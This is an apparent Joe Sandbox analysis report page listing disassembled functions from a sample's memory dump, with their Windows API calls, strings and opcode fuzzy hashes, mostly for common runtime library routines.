Snapshot File: hcaresult_0_2_7ff731c70000_5fr5gthkjdg71.jbxd

Similarity

API ID: Message$DispatchObjectPeekSingleTranslateWait
String ID:
API String ID: 3621893840-0
Opcode ID: 778d1433a15cb232463e835737ecf941f1ea11e5feb15a2f4f0cdc38d0c17baa
Instruction ID: 7167a50dfb3a7c7abad4a00c9ec3f79a0aec3f77c12b6d6f3232ed162eeacf06
Opcode Fuzzy Hash: 778d1433a15cb232463e835737ecf941f1ea11e5feb15a2f4f0cdc38d0c17baa
Instruction Fuzzy Hash: 0CF04F22F3844692FB50AB70E454A76A311FFA4B05FE41030E64E41894DE6CD159D720

Function 00007FF731CA61DC Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 163COMMONLIBRARYCODE

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 00007FF731CA6206
abort.LIBCMT ref: 00007FF731CA646A

Strings

csm, xrefs: 00007FF731CA639A
csm, xrefs: 00007FF731CA622B

Memory Dump Source

Source File: 00000000.00000002.1694502009.00007FF731C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF731C70000, based on PE: true

Associated: 00000000.00000002.1694483643.00007FF731C70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694586704.00007FF731CB8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694612930.00007FF731CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694612930.00007FF731CD4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694685208.00007FF731CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694685208.00007FF731CDE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff731c70000_5fr5gthkjdg71.jbxd

Similarity

API ID: __except_validate_context_recordabort
String ID: csm$csm
API String ID: 746414643-3733052814
Opcode ID: 45511b213c9a374d7ceaaf4858a5ad53e2acac7686b2eca8251f0658937cf8b7
Instruction ID: 1406a8d2e2e9bca49b0ddc43b7fd6179c881d10631fdff4b2a72504cba72aeef
Opcode Fuzzy Hash: 45511b213c9a374d7ceaaf4858a5ad53e2acac7686b2eca8251f0658937cf8b7
Instruction Fuzzy Hash: EB71E272D086A19ADB62AF25D05077DFBA1EB00F88FA48535DE8C47A89CF7CD491D710

Function 00007FF731CA8074 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 145COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF731CA809B
_invalid_parameter_noinfo.LIBCMT ref: 00007FF731CA826D

Strings

*, xrefs: 00007FF731CA81A1
, xrefs: 00007FF731CA81F6

Memory Dump Source

Source File: 00000000.00000002.1694502009.00007FF731C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF731C70000, based on PE: true

Associated: 00000000.00000002.1694483643.00007FF731C70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694586704.00007FF731CB8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694612930.00007FF731CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694612930.00007FF731CD4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694685208.00007FF731CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694685208.00007FF731CDE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff731c70000_5fr5gthkjdg71.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: $*
API String ID: 3215553584-3982473090
Opcode ID: 9f157a4f6751954bae8bab9751d51363cef21cdc707d610504346d4c75dafc04
Instruction ID: ea6ead05c321e72fdf0c4dc5f8bbf05eb694be3ef8a92e9373c7198a3bfd83b5
Opcode Fuzzy Hash: 9f157a4f6751954bae8bab9751d51363cef21cdc707d610504346d4c75dafc04
Instruction Fuzzy Hash: 93519972D0C642ABE766AF74804437CB7A0FB15B0AFB41A35C64E411D9DFBCE481E625

Function 00007FF731CB16D8 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 126COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32 ref: 00007FF731CB174B
MultiByteToWideChar.KERNEL32 ref: 00007FF731CB1814
GetStringTypeW.KERNEL32 ref: 00007FF731CB182E

Strings

$%s, xrefs: 00007FF731CB16DA

Memory Dump Source

Source File: 00000000.00000002.1694502009.00007FF731C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF731C70000, based on PE: true

Associated: 00000000.00000002.1694483643.00007FF731C70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694586704.00007FF731CB8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694612930.00007FF731CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694612930.00007FF731CD4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694685208.00007FF731CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694685208.00007FF731CDE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff731c70000_5fr5gthkjdg71.jbxd

Similarity

API ID: ByteCharMultiWide$StringType
String ID: $%s
API String ID: 3586891840-3791308623
Opcode ID: e5e9050dfdaeb3c12b157b48f2e5ef5602bf6f551ba74a9a670d22b2743eb576
Instruction ID: 746460b6488983dbd4f7fb618419e72944250d90f4fdeb5c0e39a009d8659411
Opcode Fuzzy Hash: e5e9050dfdaeb3c12b157b48f2e5ef5602bf6f551ba74a9a670d22b2743eb576
Instruction Fuzzy Hash: 7841B622F14B81AAEB11DF65E8003A9A395FB44BA8FA94635DE1E477C4DFBCE441D310

Function 00007FF731CA6620 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 117COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF731CA5190: abort.LIBCMT ref: 00007FF731CA51A3

__except_validate_context_record.LIBVCRUNTIME ref: 00007FF731CA66CA
_CreateFrameInfo.LIBVCRUNTIME ref: 00007FF731CA66F6

Strings

csm, xrefs: 00007FF731CA67F6

Memory Dump Source

Source File: 00000000.00000002.1694502009.00007FF731C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF731C70000, based on PE: true

Associated: 00000000.00000002.1694483643.00007FF731C70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694586704.00007FF731CB8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694612930.00007FF731CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694612930.00007FF731CD4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694685208.00007FF731CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694685208.00007FF731CDE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff731c70000_5fr5gthkjdg71.jbxd

Similarity

API ID: CreateFrameInfo__except_validate_context_recordabort
String ID: csm
API String ID: 2466640111-1018135373
Opcode ID: ef48871438151390fa300b301edbe87f2aaf35895cd4fd9de5e2d21b12dcaab2
Instruction ID: c0e2caeb0f4ddca9c774f422ce641661ebe57e1e0a1089abf1ff913e4f8c2bc3
Opcode Fuzzy Hash: ef48871438151390fa300b301edbe87f2aaf35895cd4fd9de5e2d21b12dcaab2
Instruction Fuzzy Hash: 2E519E72A1874196D721EB65E44026EB7F4FB88B90FA04934DB8C47B56CF7CE450DB10

Function 00007FF731CB42E0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 100fileCOMMON

Download Yara Rule

APIs

WideCharToMultiByte.KERNEL32 ref: 00007FF731CB43C6
WriteFile.KERNEL32 ref: 00007FF731CB43F9
GetLastError.KERNEL32 ref: 00007FF731CB441B

Strings

U, xrefs: 00007FF731CB43A4

Memory Dump Source

Source File: 00000000.00000002.1694502009.00007FF731C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF731C70000, based on PE: true

Associated: 00000000.00000002.1694483643.00007FF731C70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694586704.00007FF731CB8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694612930.00007FF731CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694612930.00007FF731CD4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694685208.00007FF731CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694685208.00007FF731CDE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff731c70000_5fr5gthkjdg71.jbxd

Similarity

API ID: ByteCharErrorFileLastMultiWideWrite
String ID: U
API String ID: 2456169464-4171548499
Opcode ID: d45e585e69c0243794f741c6b44cd1cf0a8545c3e68d7014f3b50cee5fd1175b
Instruction ID: 14839451672d416f6d9b6450f931d54be9b2f230a71595034d5365b5268326c3
Opcode Fuzzy Hash: d45e585e69c0243794f741c6b44cd1cf0a8545c3e68d7014f3b50cee5fd1175b
Instruction Fuzzy Hash: C241B422A1DA8192D710DF25E8443F9B7A0FB88B94F948031EE4E87B54DFBCD451DB50

Function 00007FF731C99030 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 83COMMON

Download Yara Rule

APIs

GetDC.USER32 ref: 00007FF731C99059
GetObjectW.GDI32 ref: 00007FF731C99087
ReleaseDC.USER32 ref: 00007FF731C9913B

Strings

, xrefs: 00007FF731C990D3

Memory Dump Source

Source File: 00000000.00000002.1694502009.00007FF731C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF731C70000, based on PE: true

Associated: 00000000.00000002.1694483643.00007FF731C70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694586704.00007FF731CB8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694612930.00007FF731CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694612930.00007FF731CD4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694685208.00007FF731CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694685208.00007FF731CDE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff731c70000_5fr5gthkjdg71.jbxd

Similarity

API ID: ObjectRelease
String ID:
API String ID: 1429681911-3916222277
Opcode ID: 9b4f6076e1c5c019ef354d78af0e0b1b4430159407e758763c369daf3f7713af
Instruction ID: f2fb255c0017d2d73d889bdfe139c0a7480a8ae961d11839192ba6118bf87a58
Opcode Fuzzy Hash: 9b4f6076e1c5c019ef354d78af0e0b1b4430159407e758763c369daf3f7713af
Instruction Fuzzy Hash: AC315036B0874296EB04EF12B81872AB7A0F789FD1F904435ED4A43B54CE7CE459DB10

Function 00007FF731C8E7EC Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 53COMMON

Download Yara Rule

APIs

InitializeCriticalSection.KERNEL32(?,?,?,00007FF731C930FF,?,?,00001000,00007FF731C7E52D), ref: 00007FF731C8E837
CreateSemaphoreW.KERNEL32(?,?,?,00007FF731C930FF,?,?,00001000,00007FF731C7E52D), ref: 00007FF731C8E847
CreateEventW.KERNEL32(?,?,?,00007FF731C930FF,?,?,00001000,00007FF731C7E52D), ref: 00007FF731C8E860

Strings

Thread pool initialization failed., xrefs: 00007FF731C8E87C

Memory Dump Source

Source File: 00000000.00000002.1694502009.00007FF731C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF731C70000, based on PE: true

Associated: 00000000.00000002.1694483643.00007FF731C70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694586704.00007FF731CB8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694612930.00007FF731CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694612930.00007FF731CD4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694685208.00007FF731CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694685208.00007FF731CDE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff731c70000_5fr5gthkjdg71.jbxd

Similarity

API ID: Create$CriticalEventInitializeSectionSemaphore
String ID: Thread pool initialization failed.
API String ID: 3340455307-2182114853
Opcode ID: b988014fa09f69f29488cf01db4975baa26b0601a0ec9a12dcfa548a4564653f
Instruction ID: d7efb9ecba6d7360871279f55b35900f7a5a58f59b2793ec336e9e920a1f14ca
Opcode Fuzzy Hash: b988014fa09f69f29488cf01db4975baa26b0601a0ec9a12dcfa548a4564653f
Instruction Fuzzy Hash: C021D532E1664196F710AF28D4543AD73A1FB88B0CFA8C034CA0C4A685CFBE945597A0

Function 00007FF731C98560 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 19COMMON

Download Yara Rule

APIs

GetDC.USER32 ref: 00007FF731C9856C
GetDeviceCaps.GDI32 ref: 00007FF731C9857D
ReleaseDC.USER32 ref: 00007FF731C9858A

Strings

, xrefs: 00007FF731C98590

Memory Dump Source

Source File: 00000000.00000002.1694502009.00007FF731C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF731C70000, based on PE: true

Associated: 00000000.00000002.1694483643.00007FF731C70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694586704.00007FF731CB8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694612930.00007FF731CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694612930.00007FF731CD4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694685208.00007FF731CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694685208.00007FF731CDE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff731c70000_5fr5gthkjdg71.jbxd

Similarity

API ID: CapsDeviceRelease
String ID:
API String ID: 127614599-3916222277
Opcode ID: a495d1c106870e0f0321fa1e920729909cda6ce65bb071f3320cbe7ab8d646f7
Instruction ID: 0da5156c25972975f7eb93cf8fdf4c39a441360e6a8dd9912a765e7101619598
Opcode Fuzzy Hash: a495d1c106870e0f0321fa1e920729909cda6ce65bb071f3320cbe7ab8d646f7
Instruction Fuzzy Hash: 13E0C222F0864196FB0867B6B58903AA361AB4CBD0F658035DA1F43794CE3CC4E48310

Function 00007FF731C7D1B8 Relevance: 6.2, APIs: 4, Instructions: 238timeCOMMON

Download Yara Rule

APIs

SetFileTime.KERNEL32 ref: 00007FF731C7D47C
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF731C7D564
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF731C7D56A
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF731C7D570

Memory Dump Source

Source File: 00000000.00000002.1694502009.00007FF731C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF731C70000, based on PE: true

Associated: 00000000.00000002.1694483643.00007FF731C70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694586704.00007FF731CB8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694612930.00007FF731CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694612930.00007FF731CD4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694685208.00007FF731CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694685208.00007FF731CDE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff731c70000_5fr5gthkjdg71.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn$FileTime
String ID:
API String ID: 1137671866-0
Opcode ID: 502a6960f05fcd6ff2fe25e167c9f3969daead463cb0be3bd9dc3b6afdf2e2f2
Instruction ID: 040d8a4a453036217f2671cf553c7c2e5836af6126814e5ea6dbf2a3b22e31a7
Opcode Fuzzy Hash: 502a6960f05fcd6ff2fe25e167c9f3969daead463cb0be3bd9dc3b6afdf2e2f2
Instruction Fuzzy Hash: 23A1F222E18B82A5EB10EB65D8942BDE371FB84794FE05131EA4D03AD9DFBCE541D720

Function 00007FF731C904C8 Relevance: 6.1, APIs: 4, Instructions: 122COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 00007FF731C9057C
SetLastError.KERNEL32 ref: 00007FF731C90617

Memory Dump Source

Source File: 00000000.00000002.1694502009.00007FF731C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF731C70000, based on PE: true

Associated: 00000000.00000002.1694483643.00007FF731C70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694586704.00007FF731CB8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694612930.00007FF731CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694612930.00007FF731CD4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694685208.00007FF731CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694685208.00007FF731CDE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff731c70000_5fr5gthkjdg71.jbxd

Similarity

API ID: ErrorLast
String ID:
API String ID: 1452528299-0
Opcode ID: 2fc7eb535c50cd6af4d7cf13e5e1b314b2a77eba713ff83555a04c1b224355c5
Instruction ID: 7dc5b00fca3602eef1e58eb61163a89591472e243645d756bc0f151f72f33e53
Opcode Fuzzy Hash: 2fc7eb535c50cd6af4d7cf13e5e1b314b2a77eba713ff83555a04c1b224355c5
Instruction Fuzzy Hash: 8151B162F14A42A9FB00BB74D4452ECA321FB88B98FA04135DA1C57B96EEACD651D360

Function 00007FF731C99D10 Relevance: 6.1, APIs: 4, Instructions: 106COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32 ref: 00007FF731C99D3C
GetLastError.KERNEL32 ref: 00007FF731C99D88
CreateDirectoryW.KERNEL32 ref: 00007FF731C99E90
LocalFree.KERNEL32 ref: 00007FF731C99EA0

Memory Dump Source

Source File: 00000000.00000002.1694502009.00007FF731C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF731C70000, based on PE: true

Associated: 00000000.00000002.1694483643.00007FF731C70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694586704.00007FF731CB8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694612930.00007FF731CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694612930.00007FF731CD4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694685208.00007FF731CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694685208.00007FF731CDE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff731c70000_5fr5gthkjdg71.jbxd

Similarity

API ID: CreateCurrentDirectoryErrorFreeLastLocalProcess
String ID:
API String ID: 1077098981-0
Opcode ID: 9edbcf9d2794e0348031a328796bb330983a25da98c756b6acd651cd8133bd29
Instruction ID: 7ad190884daecc458dd06bc97c21120eb555974ee0aee8d4d792f1e36ee85731
Opcode Fuzzy Hash: 9edbcf9d2794e0348031a328796bb330983a25da98c756b6acd651cd8133bd29
Instruction Fuzzy Hash: 4751A132A18B4296E750EF61E4447AEF3B4FB89B84FA04035EA4E57A54DF7CE504DB10

Function 00007FF731CADADC Relevance: 6.1, APIs: 4, Instructions: 104COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF731CADB2F
WideCharToMultiByte.KERNEL32 ref: 00007FF731CADC01
GetLastError.KERNEL32 ref: 00007FF731CADC24
_invalid_parameter_noinfo.LIBCMT ref: 00007FF731CADC56

Memory Dump Source

Source File: 00000000.00000002.1694502009.00007FF731C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF731C70000, based on PE: true

Associated: 00000000.00000002.1694483643.00007FF731C70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694586704.00007FF731CB8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694612930.00007FF731CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694612930.00007FF731CD4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694685208.00007FF731CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694685208.00007FF731CDE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff731c70000_5fr5gthkjdg71.jbxd

Similarity

API ID: _invalid_parameter_noinfo$ByteCharErrorLastMultiWide
String ID:
API String ID: 4141327611-0
Opcode ID: a98e5aeb67f48d2f6f979bd70fbe768edfa1404fbf159e78b91cdf96afedf3b8
Instruction ID: 3c532bbadd3a5895e853e4d2f0bf517094da3d80096f57b5026ef498ffa4ec07
Opcode Fuzzy Hash: a98e5aeb67f48d2f6f979bd70fbe768edfa1404fbf159e78b91cdf96afedf3b8
Instruction Fuzzy Hash: A541B371E0874266F766AF10A86437DE390EF80B94FB44930DA4C47AD5DFACD881A720

Function 00007FF731C83940 Relevance: 6.1, APIs: 4, Instructions: 101fileCOMMON

Download Yara Rule

APIs

MoveFileW.KERNEL32 ref: 00007FF731C8397D
MoveFileW.KERNEL32 ref: 00007FF731C839F4
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF731C83AAB
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF731C83AB1

Memory Dump Source

Source File: 00000000.00000002.1694502009.00007FF731C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF731C70000, based on PE: true

Associated: 00000000.00000002.1694483643.00007FF731C70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694586704.00007FF731CB8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694612930.00007FF731CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694612930.00007FF731CD4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694685208.00007FF731CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694685208.00007FF731CDE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff731c70000_5fr5gthkjdg71.jbxd

Similarity

API ID: FileMove_invalid_parameter_noinfo_noreturn
String ID:
API String ID: 3823481717-0
Opcode ID: 930a69d4a68418f54a984dac1d66c28d9725d16089e00c4b4ab1159678b5317d
Instruction ID: 29c8fa3cb77e1c346732f54f55332bfa3e2e11c44f1a0fd6f2d8eee41e34c31c
Opcode Fuzzy Hash: 930a69d4a68418f54a984dac1d66c28d9725d16089e00c4b4ab1159678b5317d
Instruction Fuzzy Hash: A241E462F10792A4FF00EFB4E8851ECA371FB44B98BA06235DE5D27A99DFB8D441D250

Function 00007FF731CB0AF8 Relevance: 6.1, APIs: 4, Instructions: 74COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,00007FF731CAC3DB), ref: 00007FF731CB0B11
WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,00007FF731CAC3DB), ref: 00007FF731CB0B73
WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,00007FF731CAC3DB), ref: 00007FF731CB0BAD
FreeEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,00007FF731CAC3DB), ref: 00007FF731CB0BD7

Memory Dump Source

Source File: 00000000.00000002.1694502009.00007FF731C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF731C70000, based on PE: true

Associated: 00000000.00000002.1694483643.00007FF731C70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694586704.00007FF731CB8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694612930.00007FF731CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694612930.00007FF731CD4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694685208.00007FF731CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694685208.00007FF731CDE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff731c70000_5fr5gthkjdg71.jbxd

Similarity

API ID: ByteCharEnvironmentMultiStringsWide$Free
String ID:
API String ID: 1557788787-0
Opcode ID: 57e6a8c8eb3660c1ef58ab29e04114fb274abfae31478a384663a9e2e76f5968
Instruction ID: b65b752ced5db978c613093b5dc46de3a98ba524ab3d5e1644cd8f681f251065
Opcode Fuzzy Hash: 57e6a8c8eb3660c1ef58ab29e04114fb274abfae31478a384663a9e2e76f5968
Instruction Fuzzy Hash: E1216121F1DB5291E720EF126440029F7A4FB54BD4BA88534DE8EA3BA4DFBCE4619350

Function 00007FF731CAD3C0 Relevance: 6.0, APIs: 4, Instructions: 43COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,00007FF731CA7EA8,?,?,?,00007FF731CA9CB5), ref: 00007FF731CAD3CA
SetLastError.KERNEL32(?,?,?,00007FF731CA7EA8,?,?,?,00007FF731CA9CB5), ref: 00007FF731CAD432
SetLastError.KERNEL32(?,?,?,00007FF731CA7EA8,?,?,?,00007FF731CA9CB5), ref: 00007FF731CAD448
abort.LIBCMT ref: 00007FF731CAD44E

Memory Dump Source

Source File: 00000000.00000002.1694502009.00007FF731C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF731C70000, based on PE: true

Associated: 00000000.00000002.1694483643.00007FF731C70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694586704.00007FF731CB8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694612930.00007FF731CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694612930.00007FF731CD4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694685208.00007FF731CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694685208.00007FF731CDE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff731c70000_5fr5gthkjdg71.jbxd

Similarity

API ID: ErrorLast$abort
String ID:
API String ID: 1447195878-0
Opcode ID: 66754dd10562acfe9150f83282709bfe11e0b7c2362ae99d4c12b657f2a22dea
Instruction ID: 52119760cfbbec2952ee68ff6d36f581e27acb78474a5507f702940c008fbeea
Opcode Fuzzy Hash: 66754dd10562acfe9150f83282709bfe11e0b7c2362ae99d4c12b657f2a22dea
Instruction Fuzzy Hash: 98018010F0920262FB5AB771A96917CD3A15F447D0FB40838D95E437D6DDACF841A220

Function 00007FF731C98510 Relevance: 6.0, APIs: 4, Instructions: 21COMMON

Download Yara Rule

APIs

GetDC.USER32 ref: 00007FF731C98518
GetDeviceCaps.GDI32 ref: 00007FF731C9852E
GetDeviceCaps.GDI32 ref: 00007FF731C98542
ReleaseDC.USER32 ref: 00007FF731C98553

Memory Dump Source

Source File: 00000000.00000002.1694502009.00007FF731C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF731C70000, based on PE: true

Associated: 00000000.00000002.1694483643.00007FF731C70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694586704.00007FF731CB8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694612930.00007FF731CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694612930.00007FF731CD4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694685208.00007FF731CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694685208.00007FF731CDE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff731c70000_5fr5gthkjdg71.jbxd

Similarity

API ID: CapsDevice$Release
String ID:
API String ID: 1035833867-0
Opcode ID: 659ac7cef5a6230f511b131fe25ef100f867fa9a2810ce63495c253f9cdf3390
Instruction ID: dff8a6ca8f680d5e48c14ccba0416f2bc8a255a8ff5b404e957bd04e6ffbfca6
Opcode Fuzzy Hash: 659ac7cef5a6230f511b131fe25ef100f867fa9a2810ce63495c253f9cdf3390
